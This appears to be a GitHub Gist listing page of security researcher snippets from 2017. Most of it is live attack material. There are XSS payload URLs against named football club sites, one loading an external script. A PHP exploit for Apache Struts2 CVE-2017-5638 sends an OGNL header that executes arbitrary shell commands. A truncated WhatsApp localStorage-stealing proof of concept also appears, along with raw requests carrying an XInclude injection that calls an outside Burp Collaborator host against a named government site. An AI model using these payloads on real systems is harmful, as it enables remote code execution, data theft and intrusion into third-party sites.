Robbie random-robbie

@random-robbie
random-robbie / everton
Created February 8, 2017 09:36
everton fc xss
http://www.evertonfc.com/search?q=fdgdgfdg'"--!><Iframe /SrcDoc=%26lt;Svg/O%26%23x6Eload%26equals;confirm%26lpar;1%26rpar;%26gt;>
@random-robbie
random-robbie / fcbarcelona.com
Created February 8, 2017 09:51
fcbarcelona.com
https://www.fcbarcelona.com/search?keywords="/> </div> </div><script src=https://openbugbounty.org/1.js>#p_fcb_cercador_WAR_fcb_components_ INSTANCE_dRUgFk4Ryv2u
https://www.fcbarcelona.com/search?keywords=" autofocus onfocus="alert('OPENBUGBOUNTY')
https://foundation.fcbarcelona.com/search?keywords="/> </div> </div><script src=https://openbugbounty.org/1.js>#p_fcb_cercador_WAR_fcb_components_ INSTANCE_dRUgFk4Ryv2u
@random-robbie
random-robbie / struts2_S2-045.py
Last active March 11, 2017 10:52
2017-5638 - Apache Struts2 S2-045
#!/usr/bin/python
# -*- coding: utf-8 -*-
import urllib2
import requests
import httplib
from markupsafe import Markup, escape
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
@random-robbie
random-robbie / struts2_S2-045.php
Last active March 11, 2017 11:21
struts2_S2-045.php
<?php
//CVE: 2017-5638 - Apache Struts2 S2-045 in PHP by Robbie Wiggins
$url = "";
$command = "";
$req = curl_init($url);
curl_setopt($req, CURLOPT_RETURNTRANSFER, true);
curl_setopt($req, CURLOPT_HTTPHEADER, array("Connection: close","User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:51.0) Gecko/20100101 Firefox/51.0","Accept: */*","Content-Type: Content-Type:%{(\x23_='multipart/form-data').(\[email protected]@DEFAULT_MEMBER_ACCESS).(\x23_memberAccess?(\x23_memberAccess=\x23dm):((\x23container=\x23context['com.opensymphony.xwork2.ActionContext.container']).(\x23ognlUtil=\x23container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(\x23ognlUtil.getExcludedPackageNames().clear()).(\x23ognlUtil.getExcludedClasses().clear()).(\x23context.setMemberAccess(\x23dm)))).(\x23cmd=''.$command.'').(\x23iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(\x23cmds=(\x23iswin?{'cmd.exe','/c',\x23cmd}:{'/bin/bash','-c',\x23cmd})).(\x23p=new java.lang.ProcessBuilder(\x23
@random-robbie
random-robbie / POC.html
Last active July 13, 2018 18:41
checkpoint whatsapp exploit steal localstorage.
<html>
<header>
<title>WhatsApp</title>
<script>
function GetStorage ()
{
var values = {};
var keys = Object.keys (localStorage);
var i = keys.length;
while (i --)
@random-robbie
random-robbie / Fix
Created March 21, 2017 08:35
kex error : no match for method server host key algo: server [ssh-rsa,ssh-dss,ecdsa-sha2-nistp256], client [ssh-ed25519] notepad++
1) nano /etc/ssh/sshd_config
2) Add this line: 'HostKey /etc/ssh/ssh_host_ed25519_key'
3) ssh-keygen -q -f /etc/ssh/ssh_host_ed25519_key -N "" -t ed25519
4) /etc/init.d/dropbear force-reload
@random-robbie
random-robbie / yahoo.txt
Last active March 24, 2017 10:07
yahoo sub domains
POST /4130/ HTTP/1.1
Host: www.en.octrooigemachtigde.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.en.octrooigemachtigde.nl/4130/
Content-Type: multipart/form-data; boundary=--------410995939
Content-Length: 739
Cookie: reftypes=%5B%22Userprofile%22%5D; TW_S_ID=ncgqt7611gbn0sbj4qbvp0dkf2
POST /findcompany HTTP/1.1
Host: www.en.octrooigemachtigde.nl
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://www.en.octrooigemachtigde.nl/
Content-Type: application/x-www-form-urlencoded
Content-Length: 110
Cookie: reftypes=%5B%22Userprofile%22%5D; TW_S_ID=ncgqt7611gbn0sbj4qbvp0dkf2
GET /onderwerpen_a_z/dtn/%3ccic%20xmlns%3axi%3d%22http%3a//www.w3.org/2001/XInclude%22%3e%3cxi%3ainclude%20href%3d%22http%3a//ioayleb1wivjm491crlfrd0nmes5k283wuohe53.burpcollaborator.net/foo%22/%3e%3c/cic%3e?select=2&q=&df=01-01-0001&dt=31-12-9999&dctermsType=&kw=&SortBy=Datum& HTTP/1.1
Host: www.nctv.nl
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Cookie: ASP.NET_SessionId=ddev3t12jg44zdntrg4gcdbk; TAFSessionId=tridion_3848c4d0-be23-45fc-be53-3622aebc2313; TAFTrackingId=tridion_f9793e47-59eb-4071-969b-595b70ba5b16; __AntiXsrfToken=ad6cd04303354aeebc7a0b15e4a702dc; _pk_id.1.b732=99dde3f61eed5e35.1491726140.1.1491726140.1491726140.; _pk_ref.1.b732=%5B%22%22%2C%22%22%2C1491726140%2C%22https%3A%2F%2Fwww.google.co.uk%2F%22%5D; _pk_ses.1.b732=*
Connection: close